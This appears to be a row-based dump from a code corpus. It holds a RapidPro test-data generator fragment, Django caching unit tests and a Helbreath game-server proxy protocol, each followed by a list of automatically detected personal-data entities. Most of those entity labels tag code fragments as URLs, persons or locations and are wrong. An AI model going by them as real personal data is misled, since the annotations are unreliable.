batch_num += 1
# create group count records manually
counts = []
for group, count in group_counts.items():
counts.append(ContactGroupCount(group=group, count=count, is_squashed=True))
group.count = count
ContactGroupCount.objects.bulk_create(counts)
def _create_contact_batch(self, batch):
"""
Bulk creates a batch of contacts from flat representations
"""
for c in batch:
c['object'] = Contact(org=c['org'], name=c['name'], language=c['language'],
is_stopped=c['is_stopped'], is_blocked=c['is_blocked'],
is_active=c['is_active'],
created_by=c['user'], created_on=c['created_on'],
modified_by=c['user'], modified_on=c['modified_on'])
Contact.objects.bulk_create([c['object'] for c in batch])
# now that contacts have pks, bulk create the actual URN, value and group membership objects
batch_urns = []
batch_values = []
batch_memberships = []
for c in batch:
org = c['org']
c['urns'] = []
if c['tel']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TEL_SCHEME,
path=c['tel'], identity=URN.from_tel(c['tel'])))
if c['twitter']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TWITTER_SCHEME,
path=c['twitter'], identity=URN.from_twitter(c['twitter'])))
if c['gender']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['gender'],
string_value=c['gender']))
if c['age']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['age'],
string_value=str(c['age']), decimal_value=c['age']))
if c['joined']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['joined'],
string_value=datetime_to_str(c['joined']), datetime_value=c['joined']))
if c['ward']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['ward'],
string_value=c['ward'].name, location_value=c['ward']))
if c['district']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['district'],
string_value=c['district'].name, location_value=c['district']))
if c['state']:
batch_values.append(Value(org=org, contact=c['object'], contact_field=org.cache['fields']['state'],
string_value=c['state'].name, location_value=c['state']))
for g in c['groups']:
batch_memberships.append(ContactGroup.contacts.through(contact=c['object'], contactgroup=g))
batch_urns += c['urns']
ContactURN.objects.bulk_create(batch_urns)
Value.objects.bulk_create(batch_values)
ContactGroup.contacts.through.objects.bulk_create(batch_memberships)
def simulate_activity(self, orgs, num_runs):
self._log("Starting simulation. Ctrl+C to cancel...\n")
runs = 0
while runs < num_runs:
try:
with transaction.atomic():
# make sure every org has an active flow
for org in orgs:
if not org.cache['activity']:
self.start_flow_activity(org)
with transaction.atomic():
org = self.random_org(orgs)
if self.probability(0.1):
self.create_unsolicited_incoming(org)
else:
self.create_flow_run(org)
runs += 1
except KeyboardInterrupt:
self._log("Shutting down...\n")
break
squash_channelcounts()
squash_flowpathcounts()
squash_flowruncounts()
prune_recentmessages()
squash_topupcredits()
squash_labelcounts()
def start_flow_activity(self, org):
assert not org.cache['activity']
user = org.cache['users'][0]
flow = self.random_choice(org.cache['flows'])
if self.probability(0.9):
# start a random group using a flow start
group = self.random_choice(org.cache['groups'])
contacts_started = list(group.contacts.values_list('id', flat=True))
self._log(" > Starting flow %s for group %s (%d) in org %s\n"
% (flow.name, group.name, len(contacts_started), org.name))
start = FlowStart.create(flow, user, groups=[group], restart_participants=True)
start.start()
else:
# start a random individual without a flow start
if not org.cache['contacts']:
return
contact = Contact.objects.get(id=self.random_choice(org.cache['contacts']))
contacts_started = [contact.id]
self._log(" > Starting flow %s for contact #%d in org %s\n" % (flow.name, contact.id, org.name))
flow.start([], [contact], restart_participants=True)
org.cache['activity'] = {'flow': flow, 'unresponded': contacts_started, 'started': list(contacts_started)}
def end_flow_activity(self, org):
self._log(" > Ending flow %s for in org %s\n" % (org.cache['activity']['flow'].name, org.name))
org.cache['activity'] = None
runs = FlowRun.objects.filter(org=org, is_active=True)
FlowRun.bulk_exit(runs, FlowRun.EXIT_TYPE_EXPIRED)
def create_flow_run(self, org):
activity = org.cache['activity']
flow = activity['flow']
if activity['unresponded']:
contact_id = self.random_choice(activity['unresponded'])
activity['unresponded'].remove(contact_id)
contact = Contact.objects.get(id=contact_id)
urn = contact.urns.first()
if urn:
self._log(" > Receiving flow responses for flow %s in org %s\n" % (flow.name, flow.org.name))
inputs = self.random_choice(flow.input_templates)
for text in inputs:
channel = flow.org.cache['channels'][0]
Msg.create_incoming(channel, six.text_type(urn), text)
# if more than 10% of contacts have responded, consider flow activity over
if len(activity['unresponded']) <= (len(activity['started']) * 0.9):
self.end_flow_activity(flow.org)
def create_unsolicited_incoming(self, org):
if not org.cache['contacts']:
return
self._log(" > Receiving unsolicited incoming message in org %s\n" % org.name)
available_contacts = list(set(org.cache['contacts']) - set(org.cache['activity']['started']))
if available_contacts:
contact = Contact.objects.get(id=self.random_choice(available_contacts))
channel = self.random_choice(org.cache['channels'])
urn = contact.urns.first()
if urn:
text = ' '.join([self.random_choice(l) for l in INBOX_MESSAGES])
Msg.create_incoming(channel, six.text_type(urn), text)
def probability(self, prob):
return self.random.random() < prob
def random_choice(self, seq, bias=1.0):
if not seq:
raise ValueError("Can't select random item from empty sequence")
return seq[int(math.pow(self.random.random(), bias) * len(seq))]
def weighted_choice(self, seq, weights):
r = self.random.random() * sum(weights)
cum_weight = 0.0
for i, item in enumerate(seq):
cum_weight += weights[i]
if r < cum_weight or (i == len(seq) - 1):
return item
def random_org(self, orgs):
"""
Returns a random org with bias toward the orgs with the lowest indexes
"""
return self.random_choice(orgs, bias=self.org_bias)
def random_date(self, start=None, end=None):
if not end:
end = timezone.now()
if not start:
start = end - timedelta(days=365)
if start == end:
return end
return ms_to_datetime(self.random.randrange(datetime_to_ms(start), datetime_to_ms(end)))
def timeline_date(self, dist):
"""
Converts a 0..1 distance into a date on this database's overall timeline
"""
seconds_span = (self.db_ends_on - self.db_begins_on).total_seconds()
return self.db_begins_on + timedelta(seconds=(seconds_span * dist))
@staticmethod
def peak_memory():
rusage_denom = 1024
if sys.platform == 'darwin':
# OSX gives value in bytes, other OSes in kilobytes
rusage_denom *= rusage_denom
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / rusage_denom
def _log(self, text):
self.stdout.write(text, ending='')
self.stdout.flush()
class DisableTriggersOn(object):
"""
Helper context manager for temporarily disabling database triggers for a given model
"""
def __init__(self, *models):
self.tables = [m._meta.db_table for m in models]
def __enter__(self):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s DISABLE TRIGGER ALL;' % table)
def __exit__(self, exc_type, exc_val, exc_tb):
with connection.cursor() as cursor:
for table in self.tables:
cursor.execute('ALTER TABLE %s ENABLE TRIGGER ALL;' % table)
| 30,703 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'django_redis'], ['LOCATION', 'URN'], ['LOCATION', 'ms_to_datetime'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'Chile'], ['LOCATION', 'Indonesia'], ['LOCATION', 'Rwanda'], ['LOCATION', 'Mexico'], ['LOCATION', 'Zambia'], ['LOCATION', 'India'], ['LOCATION', 'Brazil'], ['LOCATION', 'Sudan'], ['LOCATION', 'TYPE_ANDROID'], ['LOCATION', 'Faskari'], ['LOCATION', 'Zuru'], ['PERSON', 'Anka'], ['PERSON', "c['district'].name"], ['PERSON', 'Anka'], ['PERSON', 'LABELS'], ['PERSON', 'jeb'], ['PERSON', 'Anne'], ['PERSON', 'Bob'], ['PERSON', 'Cathy'], ['PERSON', 'Dave'], ['PERSON', 'Evan'], ['PERSON', 'George'], ['PERSON', 'Igor'], ['PERSON', 'Jameson'], ['PERSON', 'Lopez'], ['PERSON', 'Mooney'], ['PERSON', 'Roberts'], ['NRP', 'CONTACT_HAS_TWITTER_PROB'], ['DATE_TIME', 'today'], ['LOCATION', 'USER_PASSWORD'], ['LOCATION', 'DISTRICT'], ['LOCATION', 'USER_PASSWORD'], ['NRP', "org.cache['users'].append(user"], ['PERSON', 'len(CHANNELS'], ['PERSON', 'group.member'], ['PERSON', 'LABELS'], ['NRP', 'index_batch'], ['PERSON', 'tweep'], ['LOCATION', 'group.name'], ['PERSON', 'darwin'], ['DATE_TIME', 'RUSAGE_SELF).ru_maxrss / rusage_denom'], ['URL', 'https://github.com/joke2k/faker/issues/484#issuecomment-287931101'], ['URL', 'django.co'], ['URL', 'django.contrib.auth.mo'], ['URL', 'django.core.ma'], ['URL', 'django.core.management.ba'], ['URL', 'temba.channels.mo'], ['URL', 'temba.ch'], ['URL', 'temba.contacts.mo'], ['URL', 'temba.flows.mo'], ['URL', 'temba.locations.mo'], ['URL', 'temba.msgs.mo'], ['URL', 'temba.ms'], ['URL', 'temba.orgs.mo'], ['URL', 'temba.org'], ['URL', 'temba.values.mo'], ['URL', 'nigeria.bi'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'subparsers.ad'], ['URL', 'parser.ad'], ['URL', 'self.COM'], ['URL', 'self.pe'], ['URL', 'self.co'], ['URL', 'self.ba'], ['URL', 'timezone.no'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'email.com'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'self.co'], ['URL', 'Channel.CH'], ['URL', 'flow.in'], ['URL', 'flow.na'], ['URL', 'org.ca'], ['URL', 'org.ge'], ['URL', 'org.ch'], ['URL', 'ContactGroup.us'], ['URL', 'groups.fi'], ['URL', 'org.org'], ['URL', 'contacts.va'], ['URL', 'self.style.SU'], ['URL', 'self.si'], ['URL', 'self.random.ge'], ['URL', 'self.org'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'w.pa'], ['URL', 'w.parent.pa'], ['URL', 'AdminBoundary.objects.fi'], ['URL', 'self.style.SU'], ['URL', 'self.random.sh'], ['URL', 'self.random.ch'], ['URL', 'pytz.al'], ['URL', 'rapidpro.io'], ['URL', 'self.style.SU'], ['URL', 'org.in'], ['URL', 'org.ca'], ['URL', 'g.gr'], ['URL', 'ContactGroup.sy'], ['URL', 'groups.fi'], ['URL', 'self.style.SU'], ['URL', 'User.objects.cr'], ['URL', 'org.id'], ['URL', 'org.id'], ['URL', 'user.se'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Channel.objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactField.objects.cr'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'ContactGroup.cr'], ['URL', 'ContactGroup.us'], ['URL', 'groups.cr'], ['URL', 'group.me'], ['URL', 'group.co'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Label.la'], ['URL', 'objects.cr'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'org.im'], ['URL', 'self.style.SU'], ['URL', 'org.ca'], ['URL', 'Contact.ge'], ['URL', 'org.ca'], ['URL', 'self.style.SU'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'six.mo'], ['URL', 'self.ba'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'name.re'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'g.me'], ['URL', 'g.me'], ['URL', 'self.pro'], ['URL', 'g.me'], ['URL', 'self.ba'], ['URL', 'counts.it'], ['URL', 'group.co'], ['URL', 'URN.fr'], ['URL', 'URN.fr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'ContactGroup.contacts.th'], ['URL', 'transaction.at'], ['URL', 'org.ca'], ['URL', 'self.st'], ['URL', 'transaction.at'], ['URL', 'self.pro'], ['URL', 'self.cr'], ['URL', 'self.cr'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'self.pro'], ['URL', 'org.ca'], ['URL', 'group.contacts.va'], ['URL', 'flow.na'], ['URL', 'group.na'], ['URL', 'org.na'], ['URL', 'FlowStart.cr'], ['URL', 'start.st'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.id'], ['URL', 'flow.na'], ['URL', 'contact.id'], ['URL', 'org.na'], ['URL', 'flow.st'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'FlowRun.objects.fi'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'contact.urns.fi'], ['URL', 'flow.na'], ['URL', 'flow.org.na'], ['URL', 'flow.in'], ['URL', 'flow.org.ca'], ['URL', 'Msg.cr'], ['URL', 'flow.org'], ['URL', 'org.ca'], ['URL', 'org.na'], ['URL', 'org.ca'], ['URL', 'org.ca'], ['URL', 'Contact.objects.ge'], ['URL', 'org.ca'], ['URL', 'contact.urns.fi'], ['URL', 'Msg.cr'], ['URL', 'self.org'], ['URL', 'timezone.no'], ['URL', 'sys.pl'], ['URL', 'resource.ge'], ['URL', 'resource.RU'], ['URL', 'self.st'], ['URL', 'self.st'], ['URL', 'connection.cu'], ['URL', 'connection.cu']] |
87 | import unittest
import re
from nose.tools import eq_, ok_
from django.test.client import RequestFactory
from django.core.cache import cache
from fancy_cache.memory import find_urls
from . import views
class TestViews(unittest.TestCase):
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_render_home1(self):
request = self.factory.get('/anything')
response = views.home(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
# do it again
response = views.home(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_1, random_string_2)
def test_render_home2(self):
authenticated = RequestFactory(AUTH_USER='peter')
request = self.factory.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
# do it again
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_1, random_string_2)
# do it again, but with a hint to disable cache
request = authenticated.get('/2')
response = views.home2(request)
eq_(response.status_code, 200)
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_(random_string_1 != random_string_2)
def test_render_home3(self):
request = self.factory.get('/anything')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
eq_(random_string_1, random_string_2)
# the post_process_response is only called once
eq_(extra_random_1, extra_random_2)
def test_render_home3_no_cache(self):
factory = RequestFactory(AUTH_USER='peter')
request = factory.get('/3')
response = views.home3(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
ok_('In your HTML' not in response.content.decode("utf8"))
def test_render_home4(self):
request = self.factory.get('/4')
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
extra_random_1 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
response = views.home4(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
extra_random_2 = re.findall('In your HTML:(\w+)', response.content.decode("utf8"))[0]
ok_('In your HTML' in response.content.decode("utf8"))
eq_(random_string_1, random_string_2)
# the post_process_response is now called every time
ok_(extra_random_1 != extra_random_2)
def test_render_home5(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'other': 'junk'})
response = views.home5(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_2, random_string_3)
def test_render_home5bis(self):
request = self.factory.get('/4', {'foo': 'bar'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_1 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
request = self.factory.get('/4', {'foo': 'baz'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_2 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
ok_(random_string_1 != random_string_2)
request = self.factory.get('/4', {'foo': 'baz', 'bar': 'foo'})
response = views.home5bis(request)
eq_(response.status_code, 200)
ok_(re.findall('Random:\w+', response.content.decode("utf8")))
random_string_3 = re.findall('Random:(\w+)', response.content.decode("utf8"))[0]
eq_(random_string_2, random_string_3)
def test_remember_stats_all_urls(self):
request = self.factory.get('/anything')
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls(urls=['/anything'])
eq_(match[0], '/anything')
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
def test_remember_stats_all_urls_looong_url(self):
request = self.factory.get(
'PI:KEY'
'test/that/things/work/with/long/urls/too',
{
'line1': 'Bad luck, wind been blowing at my back',
'line2': "I was born to bring trouble to wherever I'm at",
'line3': "Got the number thirteen, tattooed on my neck",
'line4': "When the ink starts to itch, ",
'line5': "then the black will turn to red",
}
)
response = views.home6(request)
eq_(response.status_code, 200)
# now ask the memory thing
match, = find_urls()
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 0)
eq_(match[2]['misses'], 1)
# second time
response = views.home6(request)
eq_(response.status_code, 200)
match, = find_urls([])
ok_(match[0].startswith('/something/really'))
eq_(match[2]['hits'], 1)
eq_(match[2]['misses'], 1)
| 7,974 | [['LOCATION', 'TestCase'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['LOCATION', 'random_string_2'], ['NRP', 'post_process_response'], ['URL', 'self.factory.ge'], ['URL', 'self.factory.ge'], ['URL', 'nose.to'], ['URL', 'django.test.cl'], ['URL', 'django.core.ca'], ['URL', 'cache.me'], ['URL', 'cache.cl'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'authenticated.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'self.factory.ge'], ['URL', 'response.st'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 're.fi'], ['URL', 'response.content.de'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st'], ['URL', 'response.st']] |
88 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# hb_balancer
# High performance load balancer between Helbreath World Servers.
#
# Copyright (C) 2012 Michał Papierski dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import struct
import random
import logging
from twisted.internet import reactor
from twisted.protocols.stateful import StatefulProtocol
from twisted.python import log
from packets import Packets
class BaseHelbreathProtocol(StatefulProtocol):
''' Basic Helbreath Protocol '''
def getInitialState(self):
'''
Protocol overview:
[Key unsigned byte] [Size unsigned short] [Data Size-bytes]
'''
return (self.get_key, 1)
def get_key(self, data):
''' Get key '''
self.key, = struct.unpack('<B', data)
return (self.get_data_size, 2)
def get_data_size(self, data):
''' Read data size '''
self.data_size, = struct.unpack('<H', data)
return (self.get_data, self.data_size - 3)
def get_data(self, data):
''' Read encoded data and decode it '''
if self.key > 0:
# Decode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) ^ (self.key ^ (self.data_size - 3 - i))) - (i ^ self.key)) % 256)
data = ''.join(data)
# Pass decoded data
self.raw_data(data)
return (self.get_key, 1)
def send_message(self, data):
''' Send a Helbreath Packet data '''
key = random.randint(0, 255)
if key > 0:
# Encode
data = list(data)
for i in range(len(data)):
data[i] = chr(((ord(data[i]) + (i ^ key)) ^ (key ^ (len(data) - i))) % 256)
data = ''.join(data)
self.transport.write(struct.pack('<BH', key, len(data) + 3) + data)
def raw_data(self, data):
''' Got packet '''
pass
class ProxyHelbreathProtocol(BaseHelbreathProtocol):
''' Proxy Helbreath protocol used for proxying packets '''
def connectionMade(self):
self.factory.success(self)
def login(self, account_name, account_password, world_name):
''' Request a login '''
# Casting to str is made for sure
# world_name could be either str or unicode.
self.send_message(struct.pack('<IH10s10s30s',
Packets.MSGID_REQUEST_LOGIN, # MsgID
0, # MsgType
str(account_name),
str(account_password),
str(world_name)))
def raw_data(self, data):
self.factory.receiver(data)
self.transport.loseConnection()
class HelbreathProtocol(BaseHelbreathProtocol):
def raw_data(self, data):
# Header
msg_id, msg_type = struct.unpack('<IH', data[:6])
# Process packet data
if msg_id == Packets.MSGID_REQUEST_LOGIN:
# Client is requesting login
packet_format = '<10s10s30s'
account_name, account_password, world_name = struct.unpack(
packet_format,
data[6:]
)
self.request_login(
account_name.rstrip('\x00'),
account_password.rstrip('\x00'),
world_name.rstrip('\x00')
)
elif msg_id == Packets.MSGID_REQUEST_ENTERGAME:
# Client is trying to enter game
packet_format = '<10s10s10s10si30s120s'
player_name, map_name, account_name, account_password, \
level, world_name, cmd_line = struct.unpack(
packet_format,
data[6:])
self.request_entergame(
msg_type,
player_name.rstrip('\x00'),
map_name.rstrip('\x00'),
account_name.rstrip('\x00'),
account_password.rstrip('\x00'),
level,
world_name.rstrip('\x00'),
cmd_line.rstrip('\x00'))
else:
# Abort if a packet is not (yet) known
self.transport.loseConnection()
def request_login(self, account_name, account_password, world_name):
''' Request client login
account_name -- Account name
account_password -- Account password
world_name -- World server name
'''
def world_is_down(failure = None):
''' The requested world is offline '''
self.send_message(struct.pack('<IH',
Packets.MSGID_RESPONSE_LOG,
Packets.DEF_LOGRESMSGTYPE_NOTEXISTINGWORLDSERVER))
reactor.callLater(10, self.transport.loseConnection)
def handle_response(data):
''' Pass data and close the connection nicely '''
self.send_message(data)
reactor.callLater(10, self.transport.loseConnection)
def connection_made(remote):
''' Connection is made. Request a login. '''
log.msg('Remote connection made!')
remote.login(
account_name,
account_password,
remote.factory.world_name
)
# Request connection to a world by its name, pass some callbacks
self.factory.connect_to_world(
world_name = world_name,
receiver = handle_response,
success = connection_made,
failure = world_is_down)
log.msg('Request world %s' % (world_name, ))
def request_entergame(self, msg_type, player_name, map_name, account_name,
account_password, level, world_name, cmd_line):
''' Client wants to enter game. '''
log.msg('Request entergame player(%s) map(%s) account(%s) world(%s)' % (
player_name, map_name, account_name, world_name))
def connection_made(remote):
''' Request enter game, construct exacly the same data.
TODO: Parse the msg_type. '''
log.msg('Requesting enter game...')
remote.send_message(struct.pack('<IH10s10s10s10si30s120s',
Packets.MSGID_REQUEST_ENTERGAME,
msg_type,
player_name,
map_name,
account_name,
account_password,
level,
str(remote.factory.world_name),
cmd_line))
def error_handler(failure = None):
''' Unable to connect to destination world '''
log.err('Enter game error for account(%s) at world(%s)' % (
account_name,
world_name))
self.send_message(struct.pack('<IHB',
Packets.MSGID_RESPONSE_ENTERGAME,
Packets.DEF_ENTERGAMERESTYPE_REJECT,
Packets.DEF_REJECTTYPE_DATADIFFERENCE))
reactor.callLater(10, self.transport.loseConnection)
def response_handler(data):
''' Pass the (modified) data '''
self.send_message(data)
self.factory.connect_to_world(
world_name = world_name,
receiver = response_handler,
success = connection_made,
failure = error_handler
)
| 6,549 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2012'], ['PERSON', 'Michał Papierski'], ['LOCATION', 'MsgID'], ['PERSON', 'TODO'], ['PERSON', 'Parse'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'twisted.int'], ['URL', 'twisted.protocols.st'], ['URL', 'twisted.py'], ['URL', 'self.ge'], ['URL', 'self.ke'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ke'], ['URL', 'self.ke'], ['URL', 'self.ke'], ['URL', 'self.ge'], ['URL', 'self.tr'], ['URL', 'struct.pa'], ['URL', 'self.factory.su'], ['URL', 'self.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'self.factory.re'], ['URL', 'self.tr'], ['URL', 'Packets.MS'], ['URL', 'self.re'], ['URL', 'name.rs'], ['URL', 'password.rs'], ['URL', 'name.rs'], ['URL', 'Packets.MS'], ['URL', 'self.re'], ['URL', 'name.rs'], ['URL', 'name.rs'], ['URL', 'name.rs'], ['URL', 'password.rs'], ['URL', 'name.rs'], ['URL', 'line.rs'], ['URL', 'self.tr'], ['URL', 'self.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'Packets.DE'], ['URL', 'reactor.ca'], ['URL', 'self.tr'], ['URL', 'self.se'], ['URL', 'reactor.ca'], ['URL', 'self.tr'], ['URL', 'log.ms'], ['URL', 'self.factory.co'], ['URL', 'log.ms'], ['URL', 'log.ms'], ['URL', 'log.ms'], ['URL', 'remote.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'log.er'], ['URL', 'self.se'], ['URL', 'struct.pa'], ['URL', 'Packets.MS'], ['URL', 'Packets.DE'], ['URL', 'Packets.DE'], ['URL', 'reactor.ca'], ['URL', 'self.tr'], ['URL', 'self.se'], ['URL', 'self.factory.co']] |
89 | #!/usr/bin/env python
